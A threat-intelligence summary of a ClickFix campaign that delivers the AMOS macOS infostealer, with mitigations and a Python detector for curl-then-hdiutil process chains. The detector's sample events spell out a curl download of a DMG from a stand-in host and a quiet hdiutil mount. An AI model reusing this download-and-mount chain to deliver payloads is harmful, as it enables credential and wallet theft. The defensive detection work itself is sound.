Threat actors are deploying the AMOS Stealer on macOS by adapting the "ClickFix" social engineering technique. The attack leverages browser-based lures masquerading as AI tool errors (e.g., ChatGPT, Grok), prompting users to manually copy and execute a malicious command in the macOS Terminal. This sequence bypasses browser security and Gatekeeper by utilizing curl or wget to download a DMG file, which is then silently mounted via hdiutil. The primary objective is the exfiltration of browser passwords, session cookies, and cryptocurrency wallets.
Campaign Overview: The ClickFix Pivot
- Transition of ClickFix techniques from Windows to macOS environments to expand target reach.
- High-efficiency vectors leveraging psychological trust in AI platforms like ChatGPT and Grok.
- Strategic shift toward user-initiated execution to neutralize automated security blocks and browser warnings.
Attack Vector: Manual Command Execution
- Lures simulate technical glitches, instructing users to paste specific strings into zsh/bash.
- Execution chain: Browser Lure → Terminal Command → Remote Payload Download → DMG Mount.
- Use of the hdiutil utility to silently mount the malicious image, bypassing traditional installer prompts.
Malware Profile: AMOS Stealer
- Specifically engineered macOS infostealer designed for stealthy data harvesting.
- Targeted exfiltration of browser-stored passwords, session cookies, and system metadata.
- Active targeting of local cryptocurrency wallet files and sensitive authentication tokens.
Defensive Actions & Mitigation
- Opera Browser implemented "Paste Protect" to disrupt the clipboard-to-terminal delivery pipeline.
- Defensive monitoring should focus on anomalous curl or wget requests that trigger hdiutil mounts.
- Requirement for enhanced user education regarding the extreme risk of executing untrusted Terminal commands.
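As an added example (not code from the original article or any vendor), here is a small Python detector that implements the monitoring idea above on constructed process-start events: it flags an hdiutil attach that follows a curl or wget run from the same parent shell within a short window. The event schema, field names and sample values are assumptions for illustration.

```python
import json
from collections import defaultdict

# Constructed sample process-start events (not real telemetry). The fields mimic what an
# EDR or Endpoint Security client would record: timestamp, pid, parent pid, exe path, argv.
SAMPLE_EVENTS = [
    {"ts": 100.0, "pid": 500, "ppid": 1,
     "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "argv": ["Terminal"]},
    {"ts": 101.0, "pid": 510, "ppid": 500, "exe": "/bin/zsh", "argv": ["-zsh"]},
    # ClickFix-style chain: downloader and mount under the same interactive shell
    {"ts": 102.0, "pid": 520, "ppid": 510, "exe": "/usr/bin/curl",
     "argv": ["curl", "-s", "-o", "/tmp/update.dmg", "https://example.invalid/fix"]},
    {"ts": 103.5, "pid": 521, "ppid": 510, "exe": "/usr/bin/hdiutil",
     "argv": ["hdiutil", "attach", "-quiet", "-nobrowse", "/tmp/update.dmg"]},
    # Benign: a later curl in the same shell that mounts nothing
    {"ts": 200.0, "pid": 600, "ppid": 510, "exe": "/usr/bin/curl",
     "argv": ["curl", "-L", "https://example.invalid/readme.txt"]},
    # Benign: hdiutil with no preceding downloader under the same parent
    {"ts": 300.0, "pid": 700, "ppid": 1, "exe": "/usr/bin/hdiutil",
     "argv": ["hdiutil", "attach", "/Users/me/Downloads/app.dmg"]},
]

DOWNLOADERS = {"curl", "wget"}
WINDOW_SECONDS = 120.0  # assumed look-back window between download and mount


def _basename(path):
    return path.rsplit("/", 1)[-1]


def detect_clickfix_chain(events, window=WINDOW_SECONDS):
    """Return one alert per hdiutil attach/mount that was preceded, under the same
    parent pid (the user's shell), by a curl/wget process within `window` seconds."""
    by_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_parent[ev["ppid"]].append(ev)
    alerts = []
    for ppid, procs in by_parent.items():
        for ev in procs:
            if _basename(ev["exe"]) != "hdiutil" or not ({"attach", "mount"} & set(ev["argv"])):
                continue
            image = next((a for a in ev["argv"] if a.endswith(".dmg")), ev["argv"][-1])
            for prior in procs:  # earlier siblings only, thanks to the sort above
                gap = ev["ts"] - prior["ts"]
                if _basename(prior["exe"]) in DOWNLOADERS and 0 <= gap <= window:
                    alerts.append({"shell_pid": ppid, "downloader_pid": prior["pid"],
                                   "hdiutil_pid": ev["pid"], "image": image, "gap_s": gap})
                    break
    return alerts


if __name__ == "__main__":
    print(json.dumps(detect_clickfix_chain(SAMPLE_EVENTS), indent=2))
```

Real deployments would key on the full process lineage (Terminal → shell → child) rather than a single parent pid, and tune the window to the environment.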
Conclusion: Evolving Social Engineering
- Highlights a trend of bypassing OS-level protections (Gatekeeper) through direct human manipulation.
- Demonstrates the vulnerability of users who are comfortable with command-line interfaces.
- Necessitates a shift toward behavioral monitoring of system utilities over static signature detection.